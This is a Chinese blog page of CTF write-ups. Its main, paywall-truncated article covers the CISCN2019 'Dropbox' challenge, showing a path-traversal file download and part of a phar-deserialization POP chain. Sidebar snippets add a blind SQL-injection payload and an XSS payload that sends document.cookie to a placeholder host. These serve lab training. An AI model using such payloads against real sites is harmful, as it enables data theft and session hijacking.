[BUU/反序列化/Phar] [CISCN2019 华北赛区 Day1 Web1]Dropbox

最新推荐文章于 2024-07-20 23:15:07 发布
原创 最新推荐文章于 2024-07-20 23:15:07 发布 · 308 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#Phar #反序列化

注册登录,

上传图片,可以下载文件,对文件下载进行抓包,

此处可下载任意文件,
请添加图片描述

filename=../../index.php

找到class.php

<?php
    
class User {
   
   
    public $db;

	// 触发FileList的__call()
    public function __destruct() {
   
   
        $this->db->close();
    }
}

class FileList {
   
   
    private $files;
    private $results;
    private $funcs;

    public function __call($func, $args) {
   
   
        array_push($this->funcs, $func);
        foreach ($this->files as $file) {
   
   
            // 调用File::close(),读文件,将结果保存到results
            $this->results[$file->name()][$func] = $file->$func();
        }
    }

    public functio
最低0.47元/天 解锁文章
BUUCTF [CISCN2019 华北赛区 Day1 Web1]Dropbox 1
weixin_45642610的博客
07-08 1529
进入页面随便注册一个账号,登录。 随便上传一个图片。 用burpsuite拦截下载页面,里面有任意文件下载文件,可以下载源码。 用../../index.php格式把index.php,download.php, delete.php下载,打开发现用到class.php,也下了。 #index.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die
BUUCTF(web:1-50)
Mccc_li的博客
04-24 3462
[HCTF 2018]WarmUp 打开网页发现是一个滑稽,查看源代码: 访问这个网页: 分析代码: 1.首先可以看到它定义了一个类,类里面有个checkFile函数 2.然后有一个判断条件要求我们传入的file参数不为空,并且是字符串,然后可以通过checkFile的验证 3.如果满足的话就包含我们传入的参数 checkFile函数: 首先设置了一个白名单数组: 有两个元素source.ph...
BUUCTF WEB DROPBOX
qq_41696858的博客
03-06 590
这题考的是phar文件的应用,说到底是考的反序列化洞,我们不能一直指望有UNSERIALIZE这种明显的反序列化洞,于是phar就是一种替代选择 phar文件的细节可以看这一篇文章 https://xz.aliyun.com/t/2715 关于这题的wp个人觉得这篇写的很详细 https://www.jianshu.com/p/5b91e0b7f3ac 理清楚了应该不是啥难事 简单来说phar就是一种压缩文件格式,因此使用phar的先决条件是得有文件上传功能 phar漏洞的触发条件或者说出触发代码在mani
关于phar反序列化——BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
silence1_的博客
10-22 2963
关于phar反序列化——[CISCN2019 华北赛区 Day1 Web1]Dropbox 先看看phar是啥https://blog.csdn.net/u011474028/article/details/54973571 简单的说,phar就是php的压缩文件,它可以把多个文件归档到同一个文件中,而且不经过解压就能被 php 访问并执行,与file:// ,php://等类似,也是一种流包装器...
『CTF Web复现』BUUCTF-[CISCN2019 华北赛区 Day1 Web1]Dropbox
Ho1aAs‘s Blog
09-08 1232
利用点:任意文件读取;phar反序列化POP链读取文件;绕过MIME文件上传;任意文件删除;phar://协议触发反序列化
[CISCN2019 华北赛区 Day1 Web2]ikun 1
ubaichu的博客
07-20 2875
[CISCN2019 华北赛区 Day1 Web2]ikun 1 解题过程
[CISCN2019 华北赛区 Day1 Web2]ikun
qq_62046696的博客
10-15 787
这里的.content就是读取源文件字节流,随后将该字节流编码为Unicode编码,方便再进行更加精确的解码。看见了jwt,通过上面链接了解jwt由三个部分组成,前两个部分分别是base64编码,解码可以获得。明显不够我们就1000也没有充值界面,所以最有可能的就是这个优惠看是否可以修改。以为要成功可是,限制admin,所以我们就要看一下是通过什么判断我的用户名的。下载到本地后需要使用,make命令,就会生成jwtcrack。找到了密码,然后就可以更改为admin。然后是181页,可是。
BUUCTF】[CISCN2019 华北赛区 Day2 Web1]Hack World
aoao331198的博客
04-11 866
明确告诉了flag的位置 输入1 输入其他的基本上都没有错误回显或者信息,采用bool盲注 fuzz一波发现select没有过滤,空格过滤了 1^(ascii(substr((select(flag)from(flag)),1,1))>127) 正常回显,说明方法可行 脚本跑出每一个字符即可 import requests import time url='http://10cb7823-c884-4555-80b8-f586b15e6057.node4.buuoj.cn:81/index..
buuctf-web-[CISCN2019 华北赛区 Day1 Web1]Dropbox
weixin_43345082的博客
08-27 3432
在下载的时候可以通过抓包修改文件名filename=…/…/index.php 获得源码 有这样几个页面 重点在class.php和delete.php中 当时提示是phar反序列化 什么是phar反序列化 传送门1 传送门2 在phar://xx.phar文件的时候 可以通过某些函数触发反序列化 delete.php会执行$file->detele(); class.php中的File类...
BUUCTF:[NCTF2019]phar matches everything
末初 · mochu7
07-28 2216
题目地址:https://buuoj.cn/challenges#[NCTF2019]phar%20matches%20everything 源码地址:https://github.com/swfangzhang/My-2019NCTF/tree/master/phar matches everything catchmime.php //catchmime.php <?php class Easytest{ protected $test; public function funn
[CISCN2019 华北赛区 Day1 Web1]Dropbox
a3320315的博客
02-03 966
0x01源码 download.php <?php session_start(); if (!isset($_SESSION['login'])) { header("Location: login.php"); die(); } if (!isset($_POST['filename'])) { die(); } include "class.php"; in...
[WEB/nodejs]Nodejs知识入门和子进程
車鈊的博客
04-06 4484
文章目录入门内容Nodejs初步解构赋值事件绑定1.DOM绑定2.在JS绑定3. 绑定事件监听函数Callback回调函数子进程模块_函数child_process()参考链接 入门内容 Nodejs初步 Nodejs是在服务器端运行的JS代码,跨平台JS的运行环境, 采用V8引擎运行源代码, 利用事件驱动、非阻塞、异步I/O模型等来提高运行的性能。 使用多进程是扩展一个 Node 应用最好的方式, 被设计用来通过很多节点创建分布式应用, 这也是为什么被命名为 Node。 解构赋值 类似于解包,将对象或者数
[Tools]Pwn中用于远程交互的库函数总结
車鈊的博客
04-19 4286
Pwn中用于远程交互的库函数总结 在比赛当中经常会与端口应用交互的场景, 首先是PWN库的安装和使用, 参考资料:pwntools — pwntools 4.9.0dev documentation 安装 pip install --upgrade pwntools 导入 from pwn import * 简单IO函数 进程创建 p = process('/bin/sh') # 还可以在已经建立的连接,如IP连接和SSH连接上创建进程 # 关闭进程 p.close() 远程连接主机端口 host =
[Web/Nodejs]原型链污染EJS模块的利用分析(附源码分析)
車鈊的博客
04-06 3009
EJS _CVE-2019-10744(outputFunctionName) 在EJS引擎当中,存在一个属性opts.outputFunctionName (注:影响该位置的源数据流实际上有很多个,这个属性利用条件相对宽松,只要有就能用) 读源码 ejs作为渲染引擎,包含一些代码执行的功能,帮助将执行结果回显到页面。 【以下代码为exports.render-----调用----->handleCache】 首先调用了render的话(在我们做题时可以看到的表层函数) render调用的handl
[环境搭建/Docker-Compose]vulhub漏洞靶场环境搭建/Docker容器关闭方法
車鈊的博客
06-19 2580
安装docker 在root权限下执行此命令 curl -s https://get.docker.com/ | sh //安装新版本的docker sudo apt purge --autoremove docker.io //卸载老版本的docker sudo apt install docker.io //使用Ubuntu自带的docker包管理器安装,但是一般版本比较老 docker服务可能需要手动启动:service start docker 安装docker-compose
[Web/IP]真实IP获取原理/客户端IP伪造测试
車鈊的博客
07-27 2441
真实IP获取和客户端IP伪造 近期比赛又做到了用户IP伪造的题目,想来不如就总结一下。 为什么要确认IP? 在Web应用下,部分逻辑需要确认用户的客户端IP。如对大量频繁发送危险请求的IP进行封禁。 进行用户IP确认的方法有很多,但是部分方法降低了IP获取的难度,确牺牲了安全性,产生了IP可伪造的风险。 服务器是如何确定IP的? REMOTE_ADDR 标识发出请求的主机IP地址,代表客户端IP。这个标识完全由服务器决定,除了路由之外无法伪造,通过TCP协议根据直接请求来源的远程主机确定,服务端根据请求TC
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1965
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
[WP-Bugku积累-正则bypasss] No one knows regex better than me
車鈊的博客
03-04 1957
No one knows regex better than me 记Bugku一道关于PHP正则的新加题目 题目源码: <?php error_reporting(0); $zero=$_REQUEST['zero']; $first=$_REQUEST['first']; $second=$zero.$first; if(preg_match_all("/Yeedo|wants|a|girl|friend|or|a|flag/i",$second)){ $key=$second;
[Web/基础/DTD]XML-DTD的简要总结
車鈊的博客
10-11 1718
文章目录XML-DTD的简要总结简介包含内容DTD引用方法元素元素声明的格式空元素任意内容的元素只包含PCDATA元素带有子元素(序列)的元素声明只出现一次的元素声明最少出现一次的元素声明出现零次或者多次的元素出现零次或一次的元素声明"非.../即..."声明混合型的内容属性简介声明属性方法属性类型表默认值表默认值列举属性值多属性值的声明实体简介预定义实体内部实体声明外部实体引用参数实体用法重要说明两种重要的文本形式PCDATACDATA XML-DTD的简要总结 声明: 本文部分DTD实例取自W3C教程。
PHP 反序列化 buuctf
最新发布
01-23
### PHP 反序列化 buuCTF 挑战解题思路 #### 一、题目背景与环境设置 在buuctf平台上,存在多个涉及PHP反序列化的挑战。这些挑战通常提供一段PHP代码供参赛者审计并找出漏洞所在。例如,在NewStarCTF中的`UnserializeOne`题目中,参与者需深入理解给定的PHP脚本逻辑及其潜在的安全隐患[^1]。 #### 二、核心概念解析 对于此类题目而言,掌握PHP对象序列化和反序列化的机制至关重要。当一个对象被序列化后会转换成字符串形式存储;而通过特定手段操控该字符串再将其传递回程序执行反序列操作,则可能触发预设之外的行为模式。特别是在某些情况下,如果开发者定义了特殊方法如`__destruct()`、`process()`以及`read()`等,它们会在反序列过程中自动调用,这便成为了解决这类问题的关键切入点之一[^3]。 #### 三、具体实例分析 以一次成功的解题为例,为了使条件判断语句成立进而获得flag,需要让两个属性值相等——即`$correct`为空串且与另一个同名变量指向同一内存地址。因此可以构建如下所示的对象结构并通过`serialize()`函数得到相应的payload: ```php <?php class BUU { public $correct = ""; public $input = ""; } $a = new BUU(); $a->correct = ""; $a->input =& $a->correct; echo serialize($a); ?> ``` 上述代码片段创建了一个名为`BUU`的新类实例,并设置了其内部成员之间的引用关系使得二者共享相同的值空间。最终输出的结果即是可用于提交测试的有效载荷数据[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值